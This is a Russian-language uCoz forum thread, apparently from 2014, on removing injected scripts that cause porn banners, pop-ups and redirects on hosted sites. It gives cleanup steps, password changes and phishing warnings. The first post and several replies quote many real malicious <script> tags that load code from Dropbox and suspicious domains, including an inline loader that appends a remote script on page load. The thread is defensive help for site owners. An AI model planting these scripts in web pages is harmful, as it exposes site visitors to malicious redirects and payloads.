Модератор форума: Yuri_G |
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Если на вашем сайте появились порнобаннеры (порнобаннеры, всплывающая реклама, окна или переброс) |
Если на вашем сайте появились порнобаннеры |
Если на вашем сайте постоянные перебросы на другие сайты или появляется куча всплывающих рекламных баннеров, порнобаннеров, то вы должны проверить код страниц на наличие следующих скриптов: Код <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/hvuz2754blb414j/niucee.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/eipt4uu8dbovggv/niuggcee.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/1ca1t7akhf87zrc/flashsiteru.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/af6arwcjnknnb15/menu.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/ud3ne5xe8dcre8u/topbottom.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/kuejhhvopk6nw6z/mysql.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/g5zffknmr8da4tp/update.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4lgd2g170q96tq3/menu-v2.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4f9eakzpj17n2yw/shapka.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/tnwyduomjbcsxzm/opapo.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/207odofje1uzdl5/orororo.txt"></script> <script language="JavaScript" src="http://gocash.ws/js/slider.php?id=51"></script> <script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script> <script language='javascript' type='text/javascript' src='http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l'></script> <script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/739tqn6t0d66blax8ijp5g164r61v4ut'></script> <script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/98vihkxfbix863weu7zv9wqxjxhbbdh'></script> <script type="text/javascript" src="http://nativevat.hol.es/rases.txt"></script> <script language='javascript' charset='UTF-8' type='text/javascript' src='http://tsingera.ru/5easame6c5z7eb11wv3tp0164r61v4ut'></script> <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/6mg4oc9iyoi50h5tcwiudp6yfoe9gnd5e53tyz991m51k05'></script> <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/9bg8m0fsumq6pg79dp5ikt8sy9lxik40i89gq7udb51xjt1'></script> <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/7s0qxmmi2365xqgf6si4b17klvgtdyvrm5ex2ij7pdg5jet'></script> <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8jqhrtj5gcy538xp6e6s7h8nepubdfejg5vjptg5p0eti11'></script> Актуальные на данный момент и самые распространенные эти скрипты Код <script language='javascript' charset='UTF-8' type='text/javascript' src='http://bobrilla.com/7h4p5qn4qhr8ee1ywr1nh01af3d31nbp'></script> Код <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://iqmasa.ru/6rzofz8uuc28ef8pehs6rx5nbidd8hra473w3yk0c1n9d39'></script> Код <script language='javascript' charset='UTF-8' type='text/javascript' src='http://fasterdir.ru/8v0n2hh3me45jvyxrtdyc4164r61v4ut'></script> Код <script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/739tqn6t0d66blax8ijp5g164r61v4ut'></script> Код <script language='javascript' type='text/javascript' src='http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l'></script> Код <script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script> Код <script language="JavaScript" src="http://gocash.ws/js/slider.php?id=51"></script> Код <script language='javascript' charset='UTF-8' type='text/javascript' src='http://mobatori.com/6h3mo39hhqx8pibnjyshzo13skikuus5'></script> Код <script language='javascript' type='text/javascript' src='http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l'></script> Код <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8mi9nn0te6q68tjygr5vm573z85xk4lzw89gq7udb51xh8l'></script> Код <script language='javascript' charset='UTF-8' type='text/javascript' src='http://tsingera.ru/5easame6c5z7eb11wv3tp0164r61v4ut'></script> Код <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/6mg4oc9iyoi50h5tcwiudp6yfoe9gnd5e53tyz991m51k05'></script> Код <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/9bg8m0fsumq6pg79dp5ikt8sy9lxik40i89gq7udb51xjt1'></script> Код <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/7s0qxmmi2365xqgf6si4b17klvgtdyvrm5ex2ij7pdg5jet'></script> Код <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8jqhrtj5gcy538xp6e6s7h8nepubdfejg5vjptg5p0eti11'></script> Код <script language='javascript' charset='UTF-8' type='text/javascript' src='http://chicop.ru/68sb0mshp9b78t1epj44r8zi8bjocb9'></script> Код <script language='javascript' charset='UTF-8' type='text/javascript' src='http://mobmas.ru/s/948'></script> Код <script type="text/javascript"> (function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://knjjiiyqj.about-home.info' + '/?818010=LmcuKHw4NjU5MTM-KWdrbm5oaG0'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window); </script> <script type="text/javascript"> (function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://knjjiiyqj.about-home.info' + '/?823389=KWApL3s_MTI-NjQ5LmBsaWlvb2U'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window); </script> Как удалить: 1) Код как правило внедряется в шаблоны Страницы сайта. Модуль новости (все шаблоны) но могут быть варианты. Иногда код внедряется во все шаблоны сайта. Прописывается в верхней части шаблона или в самом низу. Реже встречается в футере (глобальный блок Нижняя часть сайта) 2) Для удаления нужно воспользоваться функцией Быстрой замены. Для этого надо пройти в панель управления - Дизайн - Управление дизайном - Быстрая замена - В поле "Что заменить" вставляете скрипт (даже если внедрено много скриптов лучше удалять по одному) - Поле на что изменить оставляете пустым и производите замену во всех действующих модулях Если скриптов много внедрено, можно попробовать многострочную замену по той же схеме 3) После очистки сайта от внедренного кода нужно обязательно сменить пароль uID профиля, которым администрируете сайт. Инструкция по изменению пароля находится тут //forum.ucoz.ru/forum/45-52299-1 4) Если после изменения uID пароля на новый сложный у вас снова и снова возникает проблема внедрения чужеродного кода, то выполните следующие инструкции: 1) создайте нового пользователя в панели управления сайтом: задайте ему Логин и сложнейший пароль 2) дайте созданному пользователю права администратора, а у бывшего uID профиля, которым администрировали сайт заберите права и переведите его в низшую группу 3) в общих настройках сайта поставьте старый Вид кнопки uID авторизации и далее администрируйте сайт локально 5) Если локальный способ администрирования для вас не подходит, то создайте в системе ещё один uID профиль, на котором не будет сайтов и прав управления ни одним из сайтов. И новый созданный профиль используйте для авторизации на сайтах системы uCoz с uID авторизацией. А uID профилем, которым вы администрируете сайт или сайты заходите только к себе на сайты и более никуда. И поставьте на uID пароль администратора сайта сложнейший пароль! 6) Заберите права доступа к админ бару другим администраторам и модераторам вашего сайта. не пускайте никого в панель управления сайтом 7) Будьте внимательны к письмам, которые приходят на вашу почту. Часто мошенники имитируют письма от вебсервиса uCoz, в которых просят вас пройти или верификацию или пройти по ссылкам, также просят ввод ваших данных (вебтоп пароль и пароль uID профиля или секретный вопрос и ответ). Если вы сомневаетесь в письме, которое вам пришло от имени сервиса, вы можете всегда спросить или на форуме в этой теме //forum.ucoz.ru/forum/45-46950-1 или перешлите его сразу на адрес abuse@ucoz.ru Будьте всегда бдительны и следите за темой //forum.ucoz.ru/forum/45-35739-1 Если вы вообще ничего не поняли, но проблема появления всплывающих порнобаннеров и переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает (если есть переброс), а так же указать происходит это под логином или под гостем |
Condor премного благодарен. Глубоко был спрятан скрипт, поэтому при поверхностном просмотре не увидел его. Так же пропало все меню сайта, не сможете подсказать как вернуть?вероятно это уже не по теме, так что извините.
|
Благодарю))
|
Oksana5339, дайте адрес проблемного сайта. когда обращаетесь в темы по безопасности всегда читайте первое сообщение и то что в первом сообщении выделено красным
|
Oksana5339, укажите адрес страницы на которой всплывает и при клике на что всплывает. и всплывает при логине или под гостем тоже
код сайта под гостем просматривается как чистый. |
kiilakas, ищем во всех шаблонах и удаляем скрипты:
Код <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/af6arwcjnknnb15/menu.txt"></script> Код <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/ud3ne5xe8dcre8u/topbottom.txt"></script> Код <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/kuejhhvopk6nw6z/mysql.txt"></script> Код <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/g5zffknmr8da4tp/update.txt"></script> Код <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4lgd2g170q96tq3/menu-v2.txt"></script> Код <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4f9eakzpj17n2yw/shapka.txt"></script> В глобальном левом блоке, где меню сайта Site menu удаляем скрипт: Код <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/5jnaave7t3m8sa44hy3vwt6c92sw0g9xy83x6g7dz9edhtx'></script> После чистки обязательно меняйте пароль от uId профиля, инструкция здесь //forum.ucoz.ru/forum/45-52299-1 После читайте первое сообщение темы //forum.ucoz.ru/forum/45-57475-1 |
kiilakas, воспользуйтесь быстрой заменой участков шаблонов, для удаления вредоносных скриптов.
2) Для удаления нужно воспользоваться функцией Быстрой замены. Для этого надо пройти в панель управления - Дизайн - Управление дизайном - Быстрая замена - В поле "Что заменить" вставляете скрипт (даже если внедрено много скриптов лучше удалять по одному) - Поле на что изменить оставляете пустым и производите замену во всех действующих модулях Если скриптов много внедрено, можно попробовать многострочную замену по той же схеме |
Здравствуйте. У меня на сайте проблема( Порнобанеры заполонили и не знаю уже как с ними бороться. Подскажите какой код надо удалить? Да еще вирус подцепился - даже боюсь заходить на сайт. И еще скажите, мне кажется, появление таких банеров напрямую зависит от оплаты за антирекламу в виде всплывающих окон (по моим наблюдениям) .Мой сайт^ AFlower135.ucoz.ru Жду и надеюсь на вашу помощь, потому как я сама не очень сильна в сайтообразовании.
да, кстати, насчет быстрой замены - вроде нашла "вредный" код, вставила его, в соответствующее поле, второе поле оставила просто чистым, так мне пишут, что напишите на что заменить.... Так что я вообще вся в растрепанных чувствах..А сайт-то детского сада, и лицензирование скоро... так что, господа хорошие помогите, чем можете, как говорится))) Сообщение отредактировал Schpilka1 - Вторник, 11 Мар 2014, 17:51:21
|
Schpilka1, откройте блок меню сайта на редактирование и удалите скрипт
Код <script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/537orcfilun9efihoayuc415qq25136d'></script> после этого читайте первое сообщение данной темы и обязательно смените пароль uid профиля, которым администрируете сайт. инструкция тут //forum.ucoz.ru/forum/45-52299-1 |
Спасибо большое за подсказку - пароль поменяла, скрипт убрала) Однако проблема с меню осталась - сам блок есть, а содержания - нет! При редактировании (администрирование) все страницы показаны, никуда не делись, а вот на странице сайта их нет, почему? что сделать, чтобы это исправить?
|
Привет всем! у миня проблема наверное будет по сложней после проверки сайта на исходящие ссылки
на сайте http://pr-cy.ru выявилась такая проблемка с моего сайта исходят левые ссылки вот как это выглядит после проверки <span rel="tooltip" class="green-normal small" title="http://click01.begun.ru/click.jsp?url=vZ2byYyGh4ZH*loYjA1VGCbPKPXzJjwb5SB5RF8A4JH30eGHBz2AxQWHDPVtUHaqBe6hbST9k*NHYEtUao7QF99MfXd-86t-U*8nwLT5P0lKkGU5xShOFkouZvKWuZ Po0fCf9aRM3mMyXdChG2hxEw97Z*qPJZ91V3p-4yOwUgPN1nMdZSU6RklgwsnHzT7R-61fpL1zOnkrK8lOvdhlqHgidraXFdqoFKi-3qCZ7FEg8Bs3VaaRZ0snPIt8B5hrkvH53FlhKn Yqq*R6bY3Cx7HBetJUmcGKUkC09u-lXpEwXZ80VhSKkbFWjKw12OIenNC*mbx3TQwoV1waMaKQZCRpYWjr5jtzh02sOBDpOy7bwkBggW6R3183vhTZ2OUuA9s8GPNZYdhXK9PVGvnf3p BcDqpXaXIgJDU4EhynS5Cbhab*8qtCUfEiWK4U2DTk6zNTfkisW7AAl-8o6T23FM*-2Tey0iSatEV5Y3fo3AE1cuFy&eurl%5B%5D=vZ2byVdWV1YH39FhJ1E1QlY0oy4UlgKlLocise*CzE*dOu-U&show_time=1394795853246">...U&show_time=1394795853246</span> <span rel="tooltip" class="green-normal small" title="http://click01.begun.ru/click.jsp?url=vZ2byTM-Pj*OA40nszJqJxnwF8rMGQMk2h9Ge0twxzzTFqpKwUzNMJyHOlfmL2fbcL4S3Z1DE3lVNMbLY2MIyDckvyCfdWHVnlNXCXZKXr2GIbBTwQuLIw0vW*SVsi T3V-*8qgbYY3HffBXqYHq-4vgjWpy3o8O8gHOYDmpOVyRHAmcA33Akf3xf80dkJ6ubMWBZxTNKz1TBBvoUTX6hwb-*o5UxqFZ5UJFsavcl2nV-hrN*s8HgwBZyPHjcPoZSsaZkiQccYZ 9*uCImsAJA0BdrAHD*aIMnUaiGSsvzqKVClauSnoILcEbRtWtsyOZOoebu4ouKjD5EcnouC6qUBzZgLcjN5zELa55glwWIjmcTyyyLQGVhJcNo*JxbWxa3uMrETtYhB6hJ8lmMRCCY1L O4jnyM*v9hxnY*V79oXzMoXmoXq5PTG62ghjPXF798Y7QcLcLUw4zlB7CY8aEe0T1ENg4cNd2v83ISfdMozLDkry7KE5MYNcz8Cy19s1CHyUDl8cMUhCRgXbbaBvP8HbMB4fogptFsCk Kw*VJo1zR76zhgc2qQPFKoK40*p1G9g*qr4BBoBzwE0kgrJ2HaJenrqTZonJwYvWPiCw&eurl%5B%5D=vZ2byVZXVle29rXsqty4z9u5LqMV4e00xqo9OvwZ0YAt2Ibd&show_time=1394795853246">...d&show_time=1394795853246</span> перелопатил все содержимое сайта все скрипты, найти так и не смог, кто сможет помочь плиз мой сайт mirmobileua.ru |
| |||